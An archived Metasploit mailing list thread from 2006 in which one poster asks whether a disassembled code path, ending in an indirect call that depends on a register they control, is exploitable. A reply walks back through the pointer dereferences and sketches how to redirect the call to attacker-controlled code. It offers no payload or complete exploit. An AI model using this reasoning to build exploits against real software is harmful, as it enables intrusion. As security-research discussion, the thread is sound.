Metasploit mailing list archives

exploitable???

From: arahzone-msf at yahoo.com (arahzone-msf at yahoo.com)
Date: Sat, 24 Jun 2006 16:02:20 -0700 (PDT)

Hi,
   
  Thanks for your help, this thing is really hard to exploit.

John Sprocket <sargoniv at gmail.com> wrote:
  whenever you look at something like this to see if it's exploitable
you can usually
see a dependency chain. to summarize. yes, it's exploitable.
would it be a pain in the ass? yea, prolly.
so your goal is to execute co0e of your choice via a function pointer.

let's be backwardz:
1B0114A3 FF52 10 CALL DWORD PTR DS:[EDX+10]
1B0114A1 8B11 MOV EDX,DWORD PTR DS:[ECX]
1B01149A 8B8C87 B0000000 MOV ECX,DWORD PTR DS:[EDI+EAX*4+B0]
1B011497 0FBFC0 MOVSX EAX,AX

let's summarize whatcha got:
your goal == calling [edx+0x10].
edx depends on the value at [ecx]
ecx then depends on the value at [edi + eax*4 + 0xb0]
and you control some of eax.
our primary variable here is edi which probably gets allocated somewhere.

so at the poc [point-of-crash] your process, you're prolly gonna want
to know the state of your
regs, like mainly edi. see what address edi was allocated at. then add
0xb0 to it.
now at 0x1b0114a1, it gets dereferenced again. so, look around for a
location where eax
points to an address that points to code that you control. then
subtract 10 and you're good
to go.

after you got that down...then comes figuring out a way to make it
"reliable". that's the exciting^W"fun" part. :)

.sargoniv



skape's shit looks like it will rock btw.
http://metasploit.blogspot.com/2006/04/interprocedural-data-flow-dependencies.html#links




----pardon this archive paste---
Subject: [framework] exploitable???
From: 
Date: Thu, 22 Jun 2006 14:24:14 -0700 (PDT)
Reply-to: framework[at]metasploit.com

________________________________
Hi,

I am controlling AX in the code below but I don't know how to exploit
it. Is this exploitable?

1B011497 0FBFC0 MOVSX EAX,AX
1B01149A 8B8C87 B0000000 MOV ECX,DWORD PTR DS:[EDI+EAX*4+B0]
1B0114A1 8B11 MOV EDX,DWORD PTR DS:[ECX]
1B0114A3 FF52 10 CALL DWORD PTR DS:[EDX+10]

Thanks in advance

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060624/830f0591/attachment.htm>

Current thread:

exploitable??? arahzone-msf at yahoo.com (Jun 22)
- <Possible follow-ups>
- exploitable??? John Sprocket (Jun 22)
  - exploitable??? arahzone-msf at yahoo.com (Jun 24)